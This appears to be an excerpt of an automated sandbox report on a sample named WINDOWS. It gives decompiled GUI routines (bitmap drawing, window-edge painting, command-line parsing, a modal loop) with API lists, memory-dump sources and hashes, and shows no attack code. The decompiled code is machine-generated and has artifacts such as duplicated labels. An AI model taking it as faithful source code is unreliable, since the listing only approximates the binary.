                                                    					_push(_t47);
                                                    					L004072C8();
                                                    					_v20 = _t47;
                                                    					if(_v20 != 0) {
                                                    						_t72 = SelectObject(_v28, _v8);
                                                    						_t85 = SelectObject(_v32, _v20);
                                                    						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                                                    						if(_t72 != 0) {
                                                    							SelectObject(_v28, _t72);
                                                    						}
                                                    						if(_t85 != 0) {
                                                    							SelectObject(_v32, _t85);
                                                    						}
                                                    					}
                                                    					_pop(_t80);
                                                    					 *[fs:eax] = _t80;
                                                    					_push(0x4261c5);
                                                    					DeleteDC(_v28);
                                                    					return DeleteDC(_v32);
                                                    				}
                                                    			}

                                                    APIs
                                                    • 733AA590.GDI32(00000000), ref: 00426087
                                                    • 733AA590.GDI32(00000000,00000000), ref: 00426091
                                                    • GetObjectA.GDI32(?,00000018,?), ref: 004260B1
                                                    • 733AA410.GDI32(?,?,00000001,00000001,00000000,00000000,004261BE,?,00000000,00000000), ref: 004260C8
                                                    • 733AAC50.USER32(00000000,00000000,004261BE,?,00000000,00000000), ref: 004260D4
                                                    • 733AA520.GDI32(00000000,?,?,00000000,0042612D,?,00000000,00000000,004261BE,?,00000000,00000000), ref: 00426101
                                                    • 733AB380.USER32(00000000,00000000,00426134,00000000,0042612D,?,00000000,00000000,004261BE,?,00000000,00000000), ref: 00426127
                                                    • SelectObject.GDI32(?,?), ref: 00426142
                                                    • SelectObject.GDI32(?,00000000), ref: 00426151
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0042617D
                                                    • SelectObject.GDI32(?,00000000), ref: 0042618B
                                                    • SelectObject.GDI32(?,00000000), ref: 00426199
                                                    • DeleteDC.GDI32(?), ref: 004261AF
                                                    • DeleteDC.GDI32(?), ref: 004261B8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                                    • String ID:
                                                    • API String ID: 956127455-0
                                                    • Opcode ID: 96549eea74ed33ff1694cbe071ccede941aae8e18c591fd20771ef1c91b8bae9
                                                    • Instruction ID: 23bfd75d1e5f7ab71a99e75aee45f16e7152ef54e2d5d773258edcec8bfffe0d
                                                    • Opcode Fuzzy Hash: 96549eea74ed33ff1694cbe071ccede941aae8e18c591fd20771ef1c91b8bae9
                                                    • Instruction Fuzzy Hash: 9D411271E04219AFDB10DBE9DC42FAFB7BCEB08704F91446AB604F7281C67869108769
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 55%
                                                    			E004424F8(intOrPtr* __eax, intOrPtr __edx) {
                                                    				intOrPtr* _v8;
                                                    				intOrPtr _v12;
                                                    				struct HDC__* _v16;
                                                    				struct tagRECT _v32;
                                                    				struct tagRECT _v48;
                                                    				void* _v64;
                                                    				struct HDC__* _t120;
                                                    				void* _t171;
                                                    				intOrPtr* _t193;
                                                    				intOrPtr* _t196;
                                                    				intOrPtr _t205;
                                                    				void* _t208;
                                                    				intOrPtr _t216;
                                                    				signed int _t234;
                                                    				void* _t237;
                                                    				void* _t239;
                                                    				intOrPtr _t240;
                                                    
                                                    				_t237 = _t239;
                                                    				_t240 = _t239 + 0xffffffc4;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
                                                    					_t120 = E00441704(_v8);
                                                    					_push(_t120);
                                                    					L00407730();
                                                    					_v16 = _t120;
                                                    					_push(_t237);
                                                    					_push(0x44275e);
                                                    					_push( *[fs:edx]);
                                                    					 *[fs:edx] = _t240;
                                                    					GetClientRect(E00441704(_v8),  &_v32);
                                                    					GetWindowRect(E00441704(_v8),  &_v48);
                                                    					MapWindowPoints(0, E00441704(_v8),  &_v48, 2);
                                                    					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                                                    					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					if( *(_v8 + 0x165) != 0) {
                                                    						_t208 = 0;
                                                    						if( *(_v8 + 0x163) != 0) {
                                                    							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
                                                    						}
                                                    						if( *(_v8 + 0x164) != 0) {
                                                    							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
                                                    						}
                                                    						_t234 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
                                                    						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
                                                    							_v48.left = _v48.left - _t208;
                                                    						}
                                                    						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
                                                    							_v48.top = _v48.top - _t208;
                                                    						}
                                                    						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
                                                    							_v48.right = _v48.right + _t208;
                                                    						}
                                                    						if((_t234 & 0x00200000) != 0) {
                                                    							_t196 =  *0x49d970; // 0x49e900
                                                    							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
                                                    						}
                                                    						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
                                                    							_v48.bottom = _v48.bottom + _t208;
                                                    						}
                                                    						if((_t234 & 0x00100000) != 0) {
                                                    							_t193 =  *0x49d970; // 0x49e900
                                                    							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
                                                    						}
                                                    						DrawEdge(_v16,  &_v48,  *(0x49bcec + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x49bcfc + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x49bd0c + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x49bd1c + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
                                                    					}
                                                    					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                                                    					FillRect(_v16,  &_v48, E00425610( *((intOrPtr*)(_v8 + 0x170))));
                                                    					_pop(_t216);
                                                    					 *[fs:eax] = _t216;
                                                    					_push(0x442765);
                                                    					_push(_v16);
                                                    					_t171 = E00441704(_v8);
                                                    					_push(_t171);
                                                    					L00407888();
                                                    					return _t171;
                                                    				} else {
                                                    					 *((intOrPtr*)( *_v8 - 0x10))();
                                                    					_t205 = E004329D8(E004328F8());
                                                    					if(_t205 != 0) {
                                                    						_t205 = _v8;
                                                    						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
                                                    							_t205 = E00432F08(E004328F8(), 0, _v8);
                                                    						}
                                                    					}
                                                    					return _t205;
                                                    				}
                                                    			}

                                                    APIs
                                                    • 733AB080.USER32(00000000), ref: 0044252C
                                                    • GetClientRect.USER32 ref: 0044254F
                                                    • GetWindowRect.USER32 ref: 00442561
                                                    • MapWindowPoints.USER32 ref: 00442577
                                                    • OffsetRect.USER32(?,?,?), ref: 0044258C
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 004425A5
                                                    • InflateRect.USER32(?,00000000,00000000), ref: 004425C3
                                                    • GetWindowLongA.USER32 ref: 00442619
                                                    • DrawEdge.USER32(?,?,00000000,00000008), ref: 004426E5
                                                    • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004426FE
                                                    • OffsetRect.USER32(?,?,?), ref: 0044271D
                                                    • FillRect.USER32 ref: 00442739
                                                    • 733AB380.USER32(00000000,?,00442765,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00442758
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                                    • String ID:
                                                    • API String ID: 156109915-0
                                                    • Opcode ID: c56058a07da977805be350d555e5f4c2bc4b18feb5411abbc630dda1f5db6ba1
                                                    • Instruction ID: af5f50b217af5c554848a1b825971ec4031c124bbe34cabe8649f27ab7cee0d4
                                                    • Opcode Fuzzy Hash: c56058a07da977805be350d555e5f4c2bc4b18feb5411abbc630dda1f5db6ba1
                                                    • Instruction Fuzzy Hash: 48911771E04208AFDB01DBA9C985EEEB7F9AF09314F5440A6F504F7252C779AE40DB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 57%
                                                    			E00432F08(void* __eax, void* __ecx, intOrPtr __edx) {
                                                    				intOrPtr _v8;
                                                    				struct HDC__* _v12;
                                                    				struct tagRECT _v28;
                                                    				struct tagRECT _v44;
                                                    				char _v56;
                                                    				char _v72;
                                                    				signed char _t43;
                                                    				struct HDC__* _t55;
                                                    				void* _t74;
                                                    				signed int _t77;
                                                    				int _t79;
                                                    				void* _t92;
                                                    				intOrPtr _t105;
                                                    				void* _t114;
                                                    				void* _t117;
                                                    				void* _t120;
                                                    				void* _t122;
                                                    				intOrPtr _t123;
                                                    
                                                    				_t120 = _t122;
                                                    				_t123 = _t122 + 0xffffffbc;
                                                    				_t92 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t114 = __eax;
                                                    				_t43 = GetWindowLongA(E00441704(_v8), 0xffffffec);
                                                    				if((_t43 & 0x00000002) == 0) {
                                                    					return _t43;
                                                    				} else {
                                                    					GetWindowRect(E00441704(_v8),  &_v44);
                                                    					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
                                                    					_t55 = E00441704(_v8);
                                                    					_push(_t55);
                                                    					L00407730();
                                                    					_v12 = _t55;
                                                    					_push(_t120);
                                                    					_push(0x433063);
                                                    					_push( *[fs:edx]);
                                                    					 *[fs:edx] = _t123;
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					_t117 = _t114;
                                                    					if(_t92 != 0) {
                                                    						_t77 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
                                                    						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
                                                    							GetSystemMetrics(2);
                                                    							_t79 = GetSystemMetrics(3);
                                                    							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                                                    							E00419804(_v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							_t117 = _t117;
                                                    							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
                                                    						}
                                                    					}
                                                    					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
                                                    					E00432B40( &_v56, 2);
                                                    					E00432A94(_t117,  &_v56, _v12, 0,  &_v44);
                                                    					_pop(_t105);
                                                    					 *[fs:eax] = _t105;
                                                    					_push(0x43306a);
                                                    					_push(_v12);
                                                    					_t74 = E00441704(_v8);
                                                    					_push(_t74);
                                                    					L00407888();
                                                    					return _t74;
                                                    				}
                                                    			}
                                                    Line addresses for the listing above (address column detached by extraction): 0x00432f09 to 0x00433070

                                                    APIs
                                                    • GetWindowLongA.USER32 ref: 00432F23
                                                    • GetWindowRect.USER32 ref: 00432F3E
                                                    • OffsetRect.USER32(?,?,?), ref: 00432F53
                                                    • 733AB080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00432F61
                                                    • GetWindowLongA.USER32 ref: 00432F92
                                                    • GetSystemMetrics.USER32 ref: 00432FA7
                                                    • GetSystemMetrics.USER32 ref: 00432FB0
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00432FBF
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00432FEC
                                                    • FillRect.USER32 ref: 00432FFA
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043301F
                                                    • 733AB380.USER32(00000000,?,0043306A,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043305D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                                    • String ID:
                                                    • API String ID: 3936689491-0
                                                    • Opcode ID: 1044420493868e0b4b43c14135ea523b993d5beeeaccf79545e6cca688bac7b0
                                                    • Instruction ID: 04c1fd49532e7d442bf35e743343acee4fdea8649fd85b2f3a22c1a56fe95c6f
                                                    • Opcode Fuzzy Hash: 1044420493868e0b4b43c14135ea523b993d5beeeaccf79545e6cca688bac7b0
                                                    • Instruction Fuzzy Hash: A9415E71E04108ABDB01EAE9CD82EDFB7BDEF49364F100126F904F7291CA78AE418765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E0042CAA8(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                                    				struct tagPOINT _v12;
                                                    				int _v16;
                                                    				struct tagRECT _v32;
                                                    				struct tagRECT _v48;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t60;
                                                    				int _t61;
                                                    				RECT* _t64;
                                                    				struct HDC__* _t65;
                                                    
                                                    				_t64 = _a8;
                                                    				_t65 = _a4;
                                                    				if( *0x49e92f != 0) {
                                                    					_t61 = 0;
                                                    					if(_a12 == 0) {
                                                    						L14:
                                                    						return _t61;
                                                    					}
                                                    					_v32.left = 0;
                                                    					_v32.top = 0;
                                                    					_v32.right = GetSystemMetrics(0);
                                                    					_v32.bottom = GetSystemMetrics(1);
                                                    					if(_t65 == 0) {
                                                    						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                    							L13:
                                                    							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                                    						} else {
                                                    							_t61 = 1;
                                                    						}
                                                    						goto L14;
                                                    					}
                                                    					_v16 = GetClipBox(_t65,  &_v48);
                                                    					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                                    						goto L14;
                                                    					}
                                                    					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                                    					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                                    						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                    							goto L13;
                                                    						}
                                                    						if(_v16 == 1) {
                                                    							_t61 = 1;
                                                    						}
                                                    						goto L14;
                                                    					} else {
                                                    						goto L13;
                                                    					}
                                                    				}
                                                    				 *0x49e91c = E0042C4FC(7, _t60,  *0x49e91c, _t64, _t65);
                                                    				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                                    				goto L14;
                                                    			}

                                                    Line addresses for the listing above (address column detached by extraction): 0x0042cab1 to 0x0042cbb8

                                                    APIs
                                                    • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042CAE1
                                                    • GetSystemMetrics.USER32 ref: 0042CB06
                                                    • GetSystemMetrics.USER32 ref: 0042CB11
                                                    • GetClipBox.GDI32(?,?), ref: 0042CB23
                                                    • GetDCOrgEx.GDI32(?,?), ref: 0042CB30
                                                    • OffsetRect.USER32(?,?,?), ref: 0042CB49
                                                    • IntersectRect.USER32 ref: 0042CB5A
                                                    • IntersectRect.USER32 ref: 0042CB70
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                    • String ID: EnumDisplayMonitors
                                                    • API String ID: 362875416-2491903729
                                                    • Opcode ID: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                    • Instruction ID: 4511490224432de624573bc09b14fa9d255139f998f9dfe8687c617b2a51fe57
                                                    • Opcode Fuzzy Hash: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                    • Instruction Fuzzy Hash: 723101B2E04219AFDB50DFA5E885EFF77BCAB05300F444537ED15E3241D638AA018BA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00402A1C(CHAR* __eax, intOrPtr* __edx) {
                                                    				char _t5;
                                                    				char _t6;
                                                    				CHAR* _t7;
                                                    				char _t9;
                                                    				CHAR* _t11;
                                                    				char _t14;
                                                    				CHAR* _t15;
                                                    				char _t17;
                                                    				CHAR* _t19;
                                                    				CHAR* _t22;
                                                    				CHAR* _t23;
                                                    				CHAR* _t32;
                                                    				intOrPtr _t33;
                                                    				intOrPtr* _t34;
                                                    				void* _t35;
                                                    				void* _t36;
                                                    
                                                    				_t34 = __edx;
                                                    				_t22 = __eax;
                                                    				while(1) {
                                                    					L2:
                                                    					_t5 =  *_t22;
                                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                                    						_t22 = CharNextA(_t22);
                                                    					}
                                                    					L2:
                                                    					_t5 =  *_t22;
                                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                                    						_t22 = CharNextA(_t22);
                                                    					}
                                                    					L4:
                                                    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
                                                    						_t36 = 0;
                                                    						_t32 = _t22;
                                                    						while(1) {
                                                    							_t6 =  *_t22;
                                                    							if(_t6 <= 0x20) {
                                                    								break;
                                                    							}
                                                    							if(_t6 != 0x22) {
                                                    								_t7 = CharNextA(_t22);
                                                    								_t36 = _t36 + _t7 - _t22;
                                                    								_t22 = _t7;
                                                    								continue;
                                                    							}
                                                    							_t22 = CharNextA(_t22);
                                                    							while(1) {
                                                    								_t9 =  *_t22;
                                                    								if(_t9 == 0 || _t9 == 0x22) {
                                                    									break;
                                                    								}
                                                    								_t11 = CharNextA(_t22);
                                                    								_t36 = _t36 + _t11 - _t22;
                                                    								_t22 = _t11;
                                                    							}
                                                    							if( *_t22 != 0) {
                                                    								_t22 = CharNextA(_t22);
                                                    							}
                                                    						}
                                                    						E0040500C(_t34, _t36);
                                                    						_t23 = _t32;
                                                    						_t33 =  *_t34;
                                                    						_t35 = 0;
                                                    						while(1) {
                                                    							_t14 =  *_t23;
                                                    							if(_t14 <= 0x20) {
                                                    								break;
                                                    							}
                                                    							if(_t14 != 0x22) {
                                                    								_t15 = CharNextA(_t23);
                                                    								if(_t15 <= _t23) {
                                                    									continue;
                                                    								} else {
                                                    									goto L27;
                                                    								}
                                                    								do {
                                                    									L27:
                                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                                    									_t23 =  &(_t23[1]);
                                                    									_t35 = _t35 + 1;
                                                    								} while (_t15 > _t23);
                                                    								continue;
                                                    							}
                                                    							_t23 = CharNextA(_t23);
                                                    							while(1) {
                                                    								_t17 =  *_t23;
                                                    								if(_t17 == 0 || _t17 == 0x22) {
                                                    									break;
                                                    								}
                                                    								_t19 = CharNextA(_t23);
                                                    								if(_t19 <= _t23) {
                                                    									continue;
                                                    								} else {
                                                    									goto L21;
                                                    								}
                                                    								do {
                                                    									L21:
                                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                                    									_t23 =  &(_t23[1]);
                                                    									_t35 = _t35 + 1;
                                                    								} while (_t19 > _t23);
                                                    							}
                                                    							if( *_t23 != 0) {
                                                    								_t23 = CharNextA(_t23);
                                                    							}
                                                    						}
                                                    						return _t23;
                                                    					} else {
                                                    						_t22 =  &(_t22[2]);
                                                    						continue;
                                                    					}
                                                    				}
                                                    			}
                                                    Line addresses for the listing above (address column detached by extraction): 0x00402a20 to 0x00402b05

                                                    APIs
                                                    • CharNextA.USER32(00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A53
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A5D
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A7A
                                                    • CharNextA.USER32(00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A84
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AAD
                                                    • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AB7
                                                    • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402ADB
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AE5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CharNext
                                                    • String ID: "$"
                                                    • API String ID: 3213498283-3758156766
                                                    • Opcode ID: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                    • Instruction ID: 7f4eabc370d0c2b1a65279813ceea620399496a62879659d683f8910f88fef49
                                                    • Opcode Fuzzy Hash: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                    • Instruction Fuzzy Hash: 3621E5447443D21ADF7169B90EC83A76B894B5A31872804BB9582B63CBDCFC48479B6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E00457244(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                    				intOrPtr* _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				short _v22;
                                                    				intOrPtr _v28;
                                                    				struct HWND__* _v32;
                                                    				char _v36;
                                                    				intOrPtr _t50;
                                                    				intOrPtr _t56;
                                                    				intOrPtr _t60;
                                                    				intOrPtr _t61;
                                                    				intOrPtr _t62;
                                                    				intOrPtr _t65;
                                                    				intOrPtr _t66;
                                                    				intOrPtr _t68;
                                                    				intOrPtr _t70;
                                                    				intOrPtr _t80;
                                                    				intOrPtr _t82;
                                                    				intOrPtr _t85;
                                                    				void* _t90;
                                                    				intOrPtr _t122;
                                                    				void* _t124;
                                                    				void* _t127;
                                                    				void* _t128;
                                                    				intOrPtr _t129;
                                                    
                                                    				_t125 = __esi;
                                                    				_t124 = __edi;
                                                    				_t105 = __ebx;
                                                    				_t127 = _t128;
                                                    				_t129 = _t128 + 0xffffffe0;
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_v36 = 0;
                                                    				_v8 = __eax;
                                                    				_push(_t127);
                                                    				_push(0x45750c);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t129;
                                                    				E004397DC();
                                                    				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                                                    					_t50 =  *0x49da70; // 0x422f48
                                                    					E00406A70(_t50,  &_v36);
                                                    					E0040D144(_v36, 1);
                                                    					E00404378();
                                                    				}
                                                    				if(GetCapture() != 0) {
                                                    					SendMessageA(GetCapture(), 0x1f, 0, 0);
                                                    				}
                                                    				ReleaseCapture();
                                                    				_t56 =  *0x49ebb8; // 0x0
                                                    				E004596E4(_t56);
                                                    				_push(_t127);
                                                    				_push(0x4574ef);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t129;
                                                    				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
                                                    				_v32 = GetActiveWindow();
                                                    				_t60 =  *0x49be70; // 0x0
                                                    				_v20 = _t60;
                                                    				_t61 =  *0x49ebbc; // 0x0
                                                    				_t62 =  *0x49ebbc; // 0x0
                                                    				E0041ACE8( *((intOrPtr*)(_t62 + 0x7c)),  *((intOrPtr*)(_t61 + 0x78)), 0);
                                                    				_t65 =  *0x49ebbc; // 0x0
                                                    				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
                                                    				_t66 =  *0x49ebbc; // 0x0
                                                    				_v22 =  *((intOrPtr*)(_t66 + 0x44));
                                                    				_t68 =  *0x49ebbc; // 0x0
                                                    				E00458714(_t68,  *((intOrPtr*)(_t61 + 0x78)), 0);
                                                    				_t70 =  *0x49ebbc; // 0x0
                                                    				_v28 =  *((intOrPtr*)(_t70 + 0x48));
                                                    				_v16 = E00451600(0, _t105, _t124, _t125);
                                                    				_push(_t127);
                                                    				_push(0x4574cd);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t129;
                                                    				E00457194(_v8);
                                                    				_push(_t127);
                                                    				_push(0x45742c);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t129;
                                                    				SendMessageA(E00441704(_v8), 0xb000, 0, 0);
                                                    				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
                                                    				do {
                                                    					_t80 =  *0x49ebb8; // 0x0
                                                    					E0045A580(_t80, _t124, _t125);
                                                    					_t82 =  *0x49ebb8; // 0x0
                                                    					if( *((char*)(_t82 + 0x9c)) == 0) {
                                                    						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
                                                    							E004570F4(_v8);
                                                    						}
                                                    					} else {
                                                    						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
                                                    					}
                                                    					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
                                                    				} while (_t85 == 0);
                                                    				_v12 = _t85;
                                                    				SendMessageA(E00441704(_v8), 0xb001, 0, 0);
                                                    				_t90 = E00441704(_v8);
                                                    				if(_t90 != GetActiveWindow()) {
                                                    					_v32 = 0;
                                                    				}
                                                    				_pop(_t122);
                                                    				 *[fs:eax] = _t122;
                                                    				_push(0x457433);
                                                    				return E0045718C();
                                                    			}

                                                    APIs
                                                    • GetCapture.USER32 ref: 004572B5
                                                    • GetCapture.USER32 ref: 004572C4
                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004572CA
                                                    • ReleaseCapture.USER32(00000000,0045750C), ref: 004572CF
                                                    • GetActiveWindow.USER32 ref: 004572F6
                                                    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0045738C
                                                    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 004573F9
                                                    • GetActiveWindow.USER32 ref: 00457408
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
